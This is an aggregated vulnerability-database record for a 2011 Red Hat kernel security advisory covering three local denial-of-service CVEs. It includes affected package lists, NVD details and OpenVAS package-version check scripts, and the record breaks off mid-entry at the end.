(RHSA-2011:0283) Moderate: kernel security, bug fix, and enhancement update
2011-02-22T05:00:00
ID RHSA-2011:0283 Type redhat Reporter RedHat Modified 2018-06-06T20:24:31
Description
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
This update fixes the following security issues:
A divide-by-zero flaw was found in the tcp_select_initial_window()
function in the Linux kernel's TCP/IP protocol suite implementation. A
local, unprivileged user could use this flaw to trigger a denial of service
by calling setsockopt() with certain options. (CVE-2010-4165, Moderate)
A use-after-free flaw in the mprotect() system call in the Linux kernel
could allow a local, unprivileged user to cause a local denial of service.
(CVE-2010-4169, Moderate)
A flaw was found in the Linux kernel execve() system call implementation.
A local, unprivileged user could cause large amounts of memory to be
allocated but not visible to the OOM (Out of Memory) killer, triggering a
denial of service. (CVE-2010-4243, Moderate)
Red Hat would like to thank Steve Chen for reporting CVE-2010-4165, and
Brad Spengler for reporting CVE-2010-4243.
This update also fixes several bugs and adds two enhancements.
Documentation for these bug fixes and enhancements will be available
shortly from the Technical Notes document linked to in the References
section.
Users should upgrade to these updated packages, which contain backported
patches to correct these issues, and fix the bugs and add the enhancements
noted in the Technical Notes. The system must be rebooted for this update
to take effect.
{"id": "RHSA-2011:0283", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2011:0283) Moderate: kernel security, bug fix, and enhancement update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A divide-by-zero flaw was found in the tcp_select_initial_window()\nfunction in the Linux kernel's TCP/IP protocol suite implementation. A\nlocal, unprivileged user could use this flaw to trigger a denial of service\nby calling setsockopt() with certain options. (CVE-2010-4165, Moderate)\n\n* A use-after-free flaw in the mprotect() system call in the Linux kernel\ncould allow a local, unprivileged user to cause a local denial of service.\n(CVE-2010-4169, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call implementation.\nA local, unprivileged user could cause large amounts of memory to be\nallocated but not visible to the OOM (Out of Memory) killer, triggering a\ndenial of service. (CVE-2010-4243, Moderate)\n\nRed Hat would like to thank Steve Chen for reporting CVE-2010-4165, and\nBrad Spengler for reporting CVE-2010-4243.\n\nThis update also fixes several bugs and adds two enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document linked to in the References\nsection.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs and add the enhancements\nnoted in the Technical Notes. The system must be rebooted for this update\nto take effect.\n", "published": "2011-02-22T05:00:00", "modified": "2018-06-06T20:24:31", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2011:0283", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "lastseen": "2019-08-13T18:46:00", "viewCount": 5, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2019-08-13T18:46:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-4169", "CVE-2010-4243", "CVE-2010-4165"]}, {"type": "openvas", "idList": ["OPENVAS:840592", "OPENVAS:1361412562310840592", "OPENVAS:1361412562310850157", "OPENVAS:870664", "OPENVAS:1361412562310122217", "OPENVAS:1361412562310870664", "OPENVAS:850157", "OPENVAS:840579", "OPENVAS:1361412562310122239", "OPENVAS:1361412562310840579"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-2010", "ELSA-2011-0283"]}, {"type": "nessus", "idList": ["FEDORA_2011-1138.NASL", "UBUNTU_USN-1073-1.NASL", "ORACLELINUX_ELSA-2011-0283.NASL", "SL_20110222_KERNEL_ON_SL6_X.NASL", "UBUNTU_USN-1054-1.NASL", "SUSE_11_KERNEL-110104.NASL", "FEDORA_2011-2134.NASL", "SUSE_11_3_KERNEL-101215.NASL", "REDHAT-RHSA-2011-0283.NASL", "ORACLELINUX_ELSA-2011-2010.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24871", "SECURITYVULNS:DOC:25594", "SECURITYVULNS:VULN:11394", "SECURITYVULNS:DOC:26447", "SECURITYVULNS:DOC:25593"]}, {"type": "seebug", "idList": ["SSV:20333", "SSV:20348", "SSV:70788", "SSV:20367", "SSV:20256", "SSV:71443"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:98797", "PACKETSTORM:99147"]}, {"type": "exploitdb", "idList": ["EDB-ID:16952", "EDB-ID:16263", "EDB-ID:15619"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:19AFA2110050988DFA5D313E85E6EBB8", "EXPLOITPACK:35A7E74CF2E35E93303353718B439DD4"]}, {"type": "ubuntu", "idList": ["USN-1119-1", "USN-1083-1", "USN-1054-1", "USN-1074-2", "USN-1186-1", "USN-1073-1", "USN-1074-1"]}, {"type": "suse", "idList": ["SUSE-SA:2011:001", "SUSE-SA:2011:004", "SUSE-SA:2011:007", "SUSE-SA:2011:002", "SUSE-SA:2011:012"]}, {"type": "redhat", "idList": ["RHSA-2010:0958", "RHSA-2011:0017", "RHSA-2011:0330"]}, {"type": "fedora", "idList": ["FEDORA:0DA9510F842", "FEDORA:329D9110666", "FEDORA:A272A110C4A", "FEDORA:BD6A910FBAE"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2153-1:FDD6A"]}], "modified": "2019-08-13T18:46:00", "rev": 2}, "vulnersScore": 6.6}, "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "noarch", "packageName": "perf", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "perf-2.6.32-71.18.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "noarch", "packageName": "kernel-doc", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-doc-2.6.32-71.18.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "noarch", "packageName": "kernel-firmware", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-firmware-2.6.32-71.18.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-bootwrapper-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-debuginfo-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-debuginfo-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-headers", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-headers-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-debuginfo-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-headers", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-headers-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-devel-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-devel-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-headers", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-headers-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-devel-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-debug-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-devel-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-debug", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-kdump", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-kdump-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "src", "packageName": "kernel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-2.6.32-71.18.1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-kdump-devel-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-debug", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-debuginfo-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-debug-devel", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-debug", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-debuginfo-common-i686", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "kernel-headers", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-headers-2.6.32-71.18.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "kernel-debug", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debug-2.6.32-71.18.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-71.18.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageVersion": "2.6.32-71.18.1.el6", "packageFilename": "kernel-kdump-debuginfo-2.6.32-71.18.1.el6.s390x.rpm", "operator": "lt"}], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:45:04", "description": "Use-after-free vulnerability in mm/mprotect.c in the Linux kernel before 2.6.37-rc2 allows local users to cause a denial of service via vectors involving an mprotect system call.", "edition": 7, "cvss3": {}, "published": "2010-11-22T13:00:00", "title": "CVE-2010-4169", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4169"], "modified": "2020-08-13T13:11:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.37", "cpe:/o:fedoraproject:fedora:13", "cpe:/o:opensuse:opensuse:11.3", "cpe:/o:suse:linux_enterprise_real_time_extension:11", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:suse:linux_enterprise_desktop:11"], "id": "CVE-2010-4169", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4169", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.37:rc1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_real_time_extension:11:sp1:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.37:-:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp1:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:45:04", "description": "The do_tcp_setsockopt function in net/ipv4/tcp.c in the Linux kernel before 2.6.37-rc2 does not properly restrict TCP_MAXSEG (aka MSS) values, which allows local users to cause a denial of service (OOPS) via a setsockopt call that specifies a small value, leading to a divide-by-zero error or incorrect use of a signed integer.", "edition": 7, "cvss3": {}, "published": "2010-11-22T13:00:00", "title": "CVE-2010-4165", "type": "cve", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4165"], "modified": "2020-08-12T17:59:00", "cpe": ["cpe:/o:opensuse:opensuse:11.2", "cpe:/o:linux:linux_kernel:2.6.37", "cpe:/o:opensuse:opensuse:11.3", "cpe:/o:suse:linux_enterprise_real_time_extension:11", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:suse:linux_enterprise_desktop:11"], "id": "CVE-2010-4165", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4165", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.37:rc1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_real_time_extension:11:sp1:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.37:-:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:45:04", "description": "fs/exec.c in the Linux kernel before 2.6.37 does not enable the OOM Killer to assess use of stack memory by arrays representing the (1) arguments and (2) environment, which allows local users to cause a denial of service (memory consumption) via a crafted exec system call, aka an \"OOM dodging issue,\" a related issue to CVE-2010-3858.", "edition": 7, "cvss3": {}, "published": "2011-01-22T22:00:00", "title": "CVE-2010-4243", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4243"], "modified": "2020-08-12T16:23:00", "cpe": [], "id": "CVE-2010-4243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4243", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}], "openvas": [{"lastseen": "2018-01-02T10:57:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "description": "Check for the Version of kernel", "modified": "2017-12-29T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:870664", "href": "http://plugins.openvas.org/nasl.php?oid=870664", "type": "openvas", "title": "RedHat Update for kernel RHSA-2011:0283-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2011:0283-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n\n * A divide-by-zero flaw was found in the tcp_select_initial_window()\n function in the Linux kernel's TCP/IP protocol suite implementation. A\n local, unprivileged user could use this flaw to trigger a denial of service\n by calling setsockopt() with certain options. (CVE-2010-4165, Moderate)\n\n * A use-after-free flaw in the mprotect() system call in the Linux kernel\n could allow a local, unprivileged user to cause a local denial of service.\n (CVE-2010-4169, Moderate)\n\n * A flaw was found in the Linux kernel execve() system call implementation.\n A local, unprivileged user could cause large amounts of memory to be\n allocated but not visible to the OOM (Out of Memory) killer, triggering a\n denial of service. (CVE-2010-4243, Moderate)\n\n Red Hat would like to thank Steve Chen for reporting CVE-2010-4165, and\n Brad Spengler for reporting CVE-2010-4243.\n\n This update also fixes several bugs and adds two enhancements.\n Documentation for these bug fixes and enhancements will be available\n shortly from the Technical Notes document linked to in the References\n section.\n\n Users should upgrade to these updated packages, which contain backported\n patches to correct these issues, and fix the bugs and add the enhancements\n noted in the Technical Notes. The system must be rebooted for this update\n to take effect.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-February/msg00026.html\");\n script_id(870664);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:44:39 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:0283-01\");\n script_name(\"RedHat Update for kernel RHSA-2011:0283-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "description": "Oracle Linux Local Security Checks ELSA-2011-0283", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122239", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-0283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-0283.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122239\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:15:16 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-0283\");\n script_tag(name:\"insight\", value:\"ELSA-2011-0283 - kernel security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-0283\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-0283.html\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", 